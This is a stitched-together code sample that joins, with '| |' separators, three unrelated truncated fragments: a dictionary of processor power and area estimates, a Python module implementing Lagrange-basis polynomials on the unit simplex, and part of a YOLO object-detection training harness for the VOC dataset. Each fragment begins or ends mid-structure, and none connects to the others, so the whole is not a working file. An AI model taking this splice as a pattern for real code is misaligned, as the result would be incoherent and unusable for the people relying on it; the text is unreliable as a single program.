'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000334333,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00029559,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000116827,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000401992,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00136625,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00304881,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0269017,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.71118,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0735086,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0913703,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.01274,
'Instruction Fetch Unit/Runtime Dynamic': 0.196196,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0544301,
'L2/Runtime Dynamic': 0.0146325,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.30583,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.537663,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0345753,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0345753,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.4691,
'Load Store Unit/Runtime Dynamic': 0.742752,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0852568,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.170514,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0302579,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0310588,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.106395,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0120998,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.314482,
'Memory Management Unit/Runtime Dynamic': 0.0431586,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.7188,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0850198,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00510475,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0447317,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
| |
r"""Polynomials on the m-dimensional unit simplex with values in :math:`\mathbb{R}^n`, expressed using the
Lagrange basis.
.. math:: l(x) = \sum_{\substack{\nu \in \mathbb{N}_0^m \\ |\nu| \leq r}} a_{\nu} l_{\nu, r}(x),
where :math:`a_{\nu} \in \mathbb{R}^n`.
Basis polynomials in the Lagrange basis are uniquely determined by selecting a sequence of
:math:`\dim \mathcal{P}_r (\Delta_c^m)` unique points (Lagrange points) in the unit simplex and demanding that the
i:th basis function has the value one at the i:th of these points and zero at all the other points.
Here we have used evenly spaced Lagrange points, so that for :math:`\dim \mathcal{P}_r (\Delta_c^m)` we have the
Lagrange points
.. math:: \{ x_{\nu} \}_{\substack{\nu \in \mathbb{N}_0^m \\ |\nu| \leq r}}, x_{\nu} = \frac{\nu}{r}.
The basis polynomials :math:`l_{\nu, r}(x), \nu \in \mathbb{N}_0^n, |\nu| \leq r` are thus uniquely determined by the
conditions
.. math:: l_{\nu, r}(x_{\mu}) = \begin{cases} 1 & \nu = \mu \\ 0 & \text{else} \end{cases}.
The set :math:`\{ l_{\nu, r} \}_{\substack{\nu \in \mathbb{N}_0^m \\ |\nu| \leq r}}` is a basis for the space
of all polynomials of degree less than or equal to r on the unit simplex, :math:`\mathcal{P}_r (\Delta_c^m)`.
"""
import numbers
import numpy as np
import polynomials_on_simplices.algebra.multiindex as multiindex
from polynomials_on_simplices.generic_tools.str_utils import (
convert_float_to_fraction, str_dot_product, str_number, str_number_array)
from polynomials_on_simplices.polynomial.code_generation.generate_lagrange_polynomial_functions_simplex import (
generate_function_specific)
from polynomials_on_simplices.polynomial.polynomials_base import PolynomialBase, get_dimension
from polynomials_on_simplices.polynomial.polynomials_monomial_basis import Polynomial
from polynomials_on_simplices.polynomial.polynomials_monomial_basis import zero_polynomial as zero_polynomial_monomial
from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis_cache import (
lagrange_basis_coefficients_cache)
def unique_identifier_lagrange_basis():
"""
Get unique identifier for the Lagrange polynomial basis on the unit simplex.
:return: Unique identifier.
:rtype: str
"""
return "Lagrange"
def generate_lagrange_point(n, r, nu):
r"""
Generate a Lagrange point indexed by a multi-index from the set of evenly spaced Lagrange points on the
n-dimensional unit simplex (:math:`\Delta_c^n`)
(Lagrange basis points are constructed so that each basis function has the value 1 at one of the points,
and 0 at all the other points).
.. math:: x_{\nu} = \frac{\nu}{r}.
:param int n: Dimension of the simplex.
:param int r: Degree of the polynomial.
:param nu: Multi-index :math:`\nu` indexing the Lagrange point, where :math:`\frac{\nu_i}{r}` gives
the i:th coordinate of the Lagrange point.
:return: Point in the n-dimensional unit simplex.
:rtype: :class:`Numpy array <numpy.ndarray>`
.. rubric:: Examples
>>> generate_lagrange_point(1, 2, (1,))
array([0.5])
>>> generate_lagrange_point(2, 2, (1, 0))
array([0.5, 0. ])
>>> generate_lagrange_point(2, 2, (0, 1))
array([0. , 0.5])
"""
# Handle special case
if r == 0:
return np.zeros(n)
point = np.empty(n)
for i in range(len(nu)):
point[i] = nu[i]
point /= r
return point
def generate_lagrange_points(n, r):
r"""
Generate evenly spaced Lagrange points on the n-dimensional unit simplex (:math:`\Delta_c^n`)
(Lagrange basis points are constructed so that each basis function has the value 1 at one of the points,
and 0 at all the other points).
.. math:: \{ x_{\nu} \}_{\substack{\nu \in \mathbb{N}_0^n \\ |\nu| \leq r}}, x_{\nu} = \frac{\nu}{r}.
:param int n: Dimension of the simplex.
:param int r: Degree of the polynomial.
:return: List of points in the n-dimensional unit simplex.
:rtype: :class:`Numpy array <numpy.ndarray>`
.. rubric:: Examples
>>> generate_lagrange_points(1, 2)
array([0. , 0.5, 1. ])
>>> generate_lagrange_points(2, 2)
array([[0. , 0. ],
[0.5, 0. ],
[1. , 0. ],
[0. , 0.5],
[0.5, 0.5],
[0. , 1. ]])
"""
if n == 1:
return np.linspace(0.0, 1.0, r + 1)
points = np.zeros((get_dimension(r, n), n))
# Handle special case
if r == 0:
return points
i = 0
for mi in multiindex.MultiIndexIterator(n, r):
points[i] = generate_lagrange_point(n, r, mi)
i += 1
return points
def get_lagrange_basis_fn_coefficients(nu, r):
r"""
Get monomial coefficients for a Lagrange basis polynomial in the basis for the space
:math:`\mathcal{P}_r(\Delta_c^n)`, with evenly spaced Lagrange points (see :func:`generate_lagrange_points`).
:param nu: Multi-index indicating which Lagrange basis polynomial we should get monomial coefficients for.
:type nu: int or :class:`~polynomials_on_simplices.algebra.multiindex.MultiIndex` or Tuple[int, ...]
:param int r: Degree of polynomial.
:return: Array containing the coefficients for the basis polynomial.
:rtype: :class:`Numpy array <numpy.ndarray>`
"""
try:
n = len(nu)
except TypeError:
n = 1
# First look for the coefficients in the cache (no need to generate cached coefficients)
if n in range(1, len(lagrange_basis_coefficients_cache) + 1):
if r in range(1, len(lagrange_basis_coefficients_cache[n - 1]) + 1):
if isinstance(nu, multiindex.MultiIndex):
return lagrange_basis_coefficients_cache[n - 1][r - 1][nu.to_tuple()]
else:
if not isinstance(nu, tuple):
return lagrange_basis_coefficients_cache[n - 1][r - 1][(nu,)]
else:
return lagrange_basis_coefficients_cache[n - 1][r - 1][nu]
# Coefficients need to be generated
return generate_lagrange_basis_fn_coefficients(nu, r)
def generate_lagrange_basis_fn_coefficients(nu, r):
r"""
Generate monomial coefficients for a Lagrange basis polynomial in the basis for the space
:math:`\mathcal{P}_r(\Delta_c^n)`, with evenly spaced Lagrange points (see :func:`generate_lagrange_points`).
:param nu: Multi-index indicating which Lagrange basis polynomial we should generate monomial coefficients for.
:type nu: int or :class:`~polynomials_on_simplices.algebra.multiindex.MultiIndex` or Tuple[int, ...]
:param int r: Degree of polynomial.
:return: Array containing the coefficients for the basis polynomial.
:rtype: :class:`Numpy array <numpy.ndarray>`
"""
try:
n = len(nu)
except TypeError:
n = 1
if not isinstance(nu, multiindex.MultiIndex):
nu = multiindex.MultiIndex(nu)
i = multiindex.get_index(nu, r)
return generate_lagrange_base_coefficients(r, n)[:, i]
def get_lagrange_base_coefficients(r, n):
r"""
Get monomial coefficients for all the Lagrange base polynomials for the space :math:`\mathcal{P}_r(\Delta_c^n)`,
with evenly spaced Lagrange points (see :func:`generate_lagrange_points`).
:param int n: Dimension of the unit simplex.
:param int r: Degree of the polynomial space.
:return: Matrix containing the coefficients for each base polynomial as column vectors.
:rtype: :class:`Numpy array <numpy.ndarray>`
"""
# First look for the coefficients in the cache (no need to generate cached coefficients)
if n in range(1, len(lagrange_basis_coefficients_cache) + 1):
if r in range(1, len(lagrange_basis_coefficients_cache[n - 1]) + 1):
coeffs = np.array([c for mi, c in lagrange_basis_coefficients_cache[n - 1][r - 1].items()]).T
return coeffs
# Coefficients need to be generated
return generate_lagrange_base_coefficients(r, n)
def generate_lagrange_base_coefficients(r, n):
r"""
Generate monomial coefficients for all the Lagrange base polynomials
for the space :math:`\mathcal{P}_r(\Delta_c^n)`, with evenly spaced Lagrange points (see
:func:`generate_lagrange_points`).
:param int n: Dimension of the unit simplex.
:param int r: Degree of the polynomial space.
:return: Matrix containing the coefficients for each base polynomial as column vectors.
:rtype: :class:`Numpy array <numpy.ndarray>`
"""
points = generate_lagrange_points(n, r)
poly_dim = len(points)
a = np.empty((poly_dim, poly_dim))
if n == 1:
for i in range(poly_dim):
for j in range(poly_dim):
a[i][j] = points[i]**j
else:
mis = multiindex.generate_all(n, r)
for i in range(poly_dim):
for j in range(poly_dim):
a[i][j] = multiindex.power(points[i], mis[j])
b = np.identity(poly_dim)
return np.linalg.solve(a, b)
class PolynomialLagrange(PolynomialBase):
r"""
Implementation of the abstract polynomial base class for a polynomial on the m-dimensional unit simplex,
expressed in the Lagrange basis.
.. math:: l(x) = \sum_{i = 0}^{\dim(\mathcal{P}_r(\mathbb{R}^m)) - 1} a_{\nu_i} l_{\nu_i, r}(x).
"""
def __init__(self, coeff, r=None, m=1):
r"""
:param coeff: Coefficients for the polynomial in the Lagrange basis for :math:`\mathcal{P}_r (\mathbb{R}^m,
\mathbb{R}^n). \text{coeff}[i] = a_{\nu_i}`, where :math:`\nu_i` is the i:th multi-index in the sequence
of all multi-indices of dimension m with norm :math:`\leq r`
(see :func:`polynomials_on_simplices.algebra.multiindex.generate` function).
Array of scalars for a scalar valued polynomial (n = 1) and array of n-dimensional vectors for a vector
valued polynomial (:math:`n \geq 2`).
:param int m: Dimension of the domain of the polynomial.
:param int r: Degree of the polynomial space. Optional, will be inferred from the number of polynomial
coefficients if not specified.
"""
PolynomialBase.__init__(self, coeff, r, m)
r = self.degree()
if not (m, r) in PolynomialLagrange._basis_polynomials_monomial_form:
PolynomialLagrange._basis_polynomials_monomial_form[(m, r)] = lagrange_basis_monomial(r, m)
# Compile function for evaluating the polynomial
self._eval_code, self._eval_fn_name = generate_function_specific(m, self.r, self.coeff)
compiled_code = compile(self._eval_code, '<auto generated monomial polynomial function, '
+ str(self.coeff) + '>', 'exec')
exec(compiled_code, globals(), locals())
self._eval_fn = locals()[self._eval_fn_name]
def __repr__(self):
return "polynomials_on_simplices.algebra.polynomial.polynomials_unit_simplex_lagrange_basis.PolynomialLagrange("\
+ str(self.coeff) + ", " + str(self.domain_dimension()) + ", " + str(self.degree()) + ")"
def basis(self):
r"""
Get basis for the space :math:`\mathcal{P}_r (\mathbb{R}^m)` used to express this polynomial.
:return: Unique identifier for the basis used.
:rtype: str
"""
return unique_identifier_lagrange_basis()
def __call__(self, x):
r"""
Evaluate the polynomial at a point :math:`x \in \mathbb{R}^m`.
:param x: Point where the polynomial should be evaluated.
:type x: float or length m :class:`Numpy array <numpy.ndarray>`
:return: Value of the polynomial.
:rtype: float or length n :class:`Numpy array <numpy.ndarray>`.
"""
return self._eval_fn(x)
def __mul__(self, other):
"""
Multiplication of this polynomial with another polynomial, a scalar, or a vector (for | |
# torch.cuda.synchronize()
for gx, pred_dets in harn._postout_to_pred_dets(inp_size, labels, batch_dets, _aidbase=dmet._pred_aidbase):
dmet._pred_aidbase += (len(pred_dets) + 1)
dmet.add_predictions(pred_dets, gid=gx)
for gx, true_dets in harn._labels_to_true_dets(inp_size, labels, _aidbase=dmet._true_aidbase):
dmet._true_aidbase += (len(true_dets) + 1)
dmet.add_truth(true_dets, gid=gx)
# if IS_PROFILING:
# torch.cuda.synchronize()
metrics_dict = ub.odict()
metrics_dict['L_bbox'] = float(harn.criterion.loss_coord)
metrics_dict['L_iou'] = float(harn.criterion.loss_conf)
metrics_dict['L_cls'] = float(harn.criterion.loss_cls)
for k, v in metrics_dict.items():
if not np.isfinite(v):
raise ValueError('{}={} is not finite'.format(k, v))
return metrics_dict
def _postout_to_pred_dets(harn, inp_size, labels, batch_dets, _aidbase=1,
undo_lb=True):
""" Convert batch predictions to coco-style annotations for scoring """
indices = labels['indices']
orig_sizes = labels['orig_sizes']
letterbox = harn.datasets[harn.current_tag].letterbox
MAX_DETS = None
bsize = len(indices)
for ix in range(bsize):
pred_dets = batch_dets[ix]
# Unpack postprocessed predictions
pred_dets = pred_dets.numpy()
pred_dets.boxes.scale(inp_size, inplace=True)
if undo_lb:
orig_size = orig_sizes[ix].data.cpu().numpy()
pred_dets.data['boxes'] = letterbox._boxes_letterbox_invert(
pred_dets.boxes, orig_size, inp_size)
else:
pred_dets.data['boxes'] = pred_dets.boxes
# sort predictions by descending score
# Take at most MAX_DETS detections to evaulate
_pred_sortx = pred_dets.argsort(reverse=True)[:MAX_DETS]
pred_dets = pred_dets.take(_pred_sortx)
pred_dets.data['aids'] = np.arange(_aidbase, _aidbase + len(pred_dets))
_aidbase += len(pred_dets)
gx = int(indices[ix].data)
# if IS_PROFILING:
# torch.cuda.synchronize()
yield gx, pred_dets
def _labels_to_true_dets(harn, inp_size, labels, _aidbase=1, undo_lb=True):
""" Convert batch groundtruth to coco-style annotations for scoring """
import kwimage
indices = labels['indices']
orig_sizes = labels['orig_sizes']
targets = labels['targets']
gt_weights = labels['gt_weights']
letterbox = harn.datasets[harn.current_tag].letterbox
# On the training set, we need to add truth due to augmentation
bsize = len(indices)
for ix in range(bsize):
target = targets[ix].view(-1, 5)
true_det = kwimage.Detections(
boxes=kwimage.Boxes(target[:, 1:5].float(), 'cxywh'),
class_idxs=target[:, 0].long(),
weights=gt_weights[ix],
)
true_det = true_det.numpy()
flags = true_det.class_idxs != -1
true_det = true_det.compress(flags)
if undo_lb:
orig_size = orig_sizes[ix].cpu().numpy()
true_det.data['boxes'] = letterbox._boxes_letterbox_invert(
true_det.boxes, orig_size, inp_size)
true_det.data['aids'] = np.arange(_aidbase, _aidbase + len(true_det))
gx = int(indices[ix].data.cpu().numpy())
# if IS_PROFILING:
# torch.cuda.synchronize()
yield gx, true_det
def on_epoch(harn):
"""
custom callback
CommandLine:
python -m netharn.examples.yolo_voc YoloHarn.on_epoch
Example:
>>> # DISABLE_DOCTSET
>>> harn = setup_yolo_harness(bsize=4)
>>> harn.initialize()
>>> weights_fpath = light_yolo.demo_voc_weights()
>>> state_dict = harn.xpu.load(weights_fpath)['weights']
>>> harn.model.module.load_state_dict(state_dict)
>>> tag = harn.current_tag = 'test'
>>> # run a few batches
>>> for i in ub.ProgIter(range(5)):
... batch = harn._demo_batch(i, tag)
... outputs, loss = harn.run_batch(batch)
... harn.on_batch(batch, outputs, loss)
>>> # then finish the epoch
>>> harn.on_epoch()
"""
metrics_dict = ub.odict()
# Measure quality
dmet = harn.dmets[harn.current_tag]
# try:
# coco_scores = dmet.score_coco()
# metrics_dict['coco-mAP'] = coco_scores['mAP']
# except ImportError:
# pass
# except Exception as ex:
# print('ex = {!r}'.format(ex))
# try:
# nh_scores = dmet.score_netharn()
# metrics_dict['nh-mAP'] = nh_scores['mAP']
# metrics_dict['nh-AP'] = nh_scores['peritem']['ap']
# except Exception as ex:
# print('ex = {!r}'.format(ex))
try:
voc_scores = dmet.score_voc()
metrics_dict['voc-mAP'] = voc_scores['mAP']
except Exception as ex:
print('ex = {!r}'.format(ex))
raise
# Reset detections
dmet.clear()
dmet._pred_aidbase = 1
dmet._true_aidbase = 1
return metrics_dict
def draw_batch(harn, batch, outputs, batch_dets, idx=None, thresh=None,
orig_img=None):
"""
Returns:
np.ndarray: numpy image
Example:
>>> # DISABLE_DOCTSET
>>> harn = setup_yolo_harness(bsize=1)
>>> harn.initialize()
>>> batch = harn._demo_batch(0, 'train')
>>> weights_fpath = light_yolo.demo_voc_weights()
>>> state_dict = harn.xpu.load(weights_fpath)['weights']
>>> harn.model.module.load_state_dict(state_dict)
>>> outputs, loss = harn.run_batch(batch)
>>> harn.on_batch(batch, outputs, loss)
>>> # xdoc: +REQUIRES(--show)
>>> import kwplot
>>> batch_dets = harn.model.module.postprocess(outputs)
>>> kwplot.autompl() # xdoc: +SKIP
>>> stacked = harn.draw_batch(batch, outputs, batch_dets, thresh=0.01)
>>> kwplot.imshow(stacked)
>>> kwplot.show_if_requested()
"""
import cv2
import kwimage
inputs, labels = batch
targets = labels['targets']
orig_sizes = labels['orig_sizes']
if idx is None:
idxs = range(len(inputs))
else:
idxs = [idx]
imgs = []
for idx in idxs:
chw01 = inputs[idx]
target = targets[idx].view(-1, 5)
pred_dets = batch_dets[idx]
label_names = harn.datasets[harn.current_tag].label_names
pred_dets.meta['classes'] = label_names
true_dets = kwimage.Detections(
boxes=kwimage.Boxes(target[:, 1:5], 'cxywh'),
class_idxs=target[:, 0].int(),
classes=label_names
)
pred_dets = pred_dets.numpy()
true_dets = true_dets.numpy()
true_dets = true_dets.compress(true_dets.class_idxs != -1)
if thresh is not None:
pred_dets = pred_dets.compress(pred_dets.scores > thresh)
hwc01 = chw01.cpu().numpy().transpose(1, 2, 0)
inp_size = np.array(hwc01.shape[0:2][::-1])
true_dets.boxes.scale(inp_size, inplace=True)
pred_dets.boxes.scale(inp_size, inplace=True)
letterbox = harn.datasets[harn.current_tag].letterbox
orig_size = orig_sizes[idx].cpu().numpy()
target_size = inp_size
img = letterbox._img_letterbox_invert(hwc01, orig_size, target_size)
img = np.clip(img, 0, 1)
# we are given the original image, to avoid artifacts from
# inverting a downscale
assert orig_img is None or orig_img.shape == img.shape
true_dets.data['boxes'] = letterbox._boxes_letterbox_invert(
true_dets.boxes, orig_size, target_size)
pred_dets.data['boxes'] = letterbox._boxes_letterbox_invert(
pred_dets.boxes, orig_size, target_size)
# shift, scale, embed_size = letterbox._letterbox_transform(orig_size, target_size)
# fig = kwplot.figure(doclf=True, fnum=1)
# kwplot.imshow(img, colorspace='rgb')
canvas = (img * 255).astype(np.uint8)
canvas = true_dets.draw_on(canvas, color='green')
canvas = pred_dets.draw_on(canvas, color='blue')
canvas = cv2.resize(canvas, (300, 300))
imgs.append(canvas)
# if IS_PROFILING:
# torch.cuda.synchronize()
stacked = imgs[0] if len(imgs) == 1 else kwimage.stack_images_grid(imgs)
return stacked
def setup_yolo_harness(bsize=16, workers=0):
"""
CommandLine:
python -m netharn.examples.yolo_voc setup_yolo_harness
Example:
>>> # DISABLE_DOCTSET
>>> harn = setup_yolo_harness()
>>> harn.initialize()
"""
xpu = nh.XPU.coerce('argv')
nice = ub.argval('--nice', default='Yolo2Baseline')
batch_size = int(ub.argval('--batch_size', default=bsize))
bstep = int(ub.argval('--bstep', 4))
workers = int(ub.argval('--workers', default=workers))
decay = float(ub.argval('--decay', default=0.0005))
lr = float(ub.argval('--lr', default=0.001))
ovthresh = 0.5
simulated_bsize = bstep * batch_size
nh.configure_hacks(workers=workers)
# We will divide the learning rate by the simulated batch size
datasets = {
'train': YoloVOCDataset(years=[2007, 2012], split='trainval'),
# 'test': YoloVOCDataset(years=[2007], split='test'),
}
loaders = {
key: dset.make_loader(batch_size=batch_size, num_workers=workers,
shuffle=(key == 'train'), pin_memory=True,
resize_rate=10 * bstep, drop_last=True)
for key, dset in datasets.items()
}
anchors = np.array([(1.3221, 1.73145), (3.19275, 4.00944),
(5.05587, 8.09892), (9.47112, 4.84053),
(11.2364, 10.0071)])
if not ub.argflag('--eav'):
lr_step_points = {
# 0: lr * 0.1 / simulated_bsize, # burnin
# 4: lr * 1.0 / simulated_bsize,
0: lr * 1.0 / simulated_bsize,
154: lr * 1.0 / simulated_bsize,
155: lr * 0.1 / simulated_bsize,
232: lr * 0.1 / simulated_bsize,
233: lr * 0.01 / simulated_bsize,
}
max_epoch = 311
scheduler_ = (nh.schedulers.core.YOLOScheduler, {
'points': lr_step_points,
# 'interpolate': False,
'interpolate': True,
'burn_in': 0.96899225 if ub.argflag('--eav') else 3.86683584, # number of epochs to burn_in for. approx 1000 batches?
'dset_size': len(datasets['train']), # when drop_last=False
# 'dset_size': (len(datasets['train']) // simulated_bsize) * simulated_bsize, # make a multiple of batch_size because drop_last=True
'batch_size': batch_size,
})
from netharn.models.yolo2 import light_region_loss
criterion_ = (light_region_loss.RegionLoss, {
'num_classes': datasets['train'].num_classes,
'anchors': anchors,
'object_scale': 5.0,
'noobject_scale': 1.0,
# eav version originally had a random *2 in cls loss,
# we removed, that but we can replicate it here.
'class_scale': 1.0 if not ub.argflag('--eav') else 2.0,
'coord_scale': 1.0,
'thresh': 0.6, # iou_thresh
'seen_thresh': 12800,
# 'small_boxes': not ub.argflag('--eav'),
'small_boxes': True,
'mse_factor': 0.5 if not ub.argflag('--eav') else 1.0,
})
else:
lr_step_points = {
# dividing by batch size was one of those unpublished details
0: lr * 0.1 / simulated_bsize,
1: lr * 1.0 / simulated_bsize,
96: lr * 1.0 / simulated_bsize,
97: lr * 0.1 / simulated_bsize,
135: lr * 0.1 / simulated_bsize,
136: lr * 0.01 / simulated_bsize,
}
max_epoch = 176
scheduler_ = (nh.schedulers.ListedLR, {
'points': lr_step_points,
'interpolate': False,
})
from netharn.models.yolo2 import region_loss2
criterion_ = (region_loss2.RegionLoss, {
'num_classes': datasets['train'].num_classes,
'anchors': anchors,
'reduction': 32,
'seen': 0,
'coord_scale' : 1.0,
'noobject_scale' : 1.0,
'object_scale' : 5.0,
'class_scale' : 1.0,
'thresh' : 0.6, # iou_thresh
# 'seen_thresh': 12800,
})
weights = ub.argval('--weights', default=None)
if weights is None or weights == 'imagenet':
weights = light_yolo.initial_imagenet_weights()
elif weights == 'lightnet':
weights = light_yolo.demo_voc_weights()
else:
print('weights = {!r}'.format(weights))
hyper = nh.HyperParams(**{
'nice': nice,
'workdir': ub.expandpath('~/work/voc_yolo2'),
'datasets': datasets,
'loaders': loaders,
'xpu': xpu,
'model': (light_yolo.Yolo, {
'num_classes': datasets['train'].num_classes,
'anchors': anchors,
'conf_thresh': 0.001,
# 'conf_thresh': 0.1, # make training a bit faster
'nms_thresh': 0.5 if not ub.argflag('--eav') else 0.4
}),
'criterion': criterion_,
'initializer': (nh.initializers.Pretrained, {
'fpath': weights,
}),
'optimizer': (torch.optim.SGD, {
'lr': lr_step_points[0],
'momentum': 0.9,
'dampening': 0,
# multiplying by batch size was one of those unpublished details
'weight_decay': decay * simulated_bsize,
}),
'scheduler': scheduler_,
'monitor': (nh.Monitor, {
'minimize': ['loss'],
'maximize': ['mAP'],
'patience': max_epoch,
'max_epoch': max_epoch,
}),
# 'augment': datasets['train'].augmenter,
'dynamics': {
# Controls how many batches to process before taking a step in the
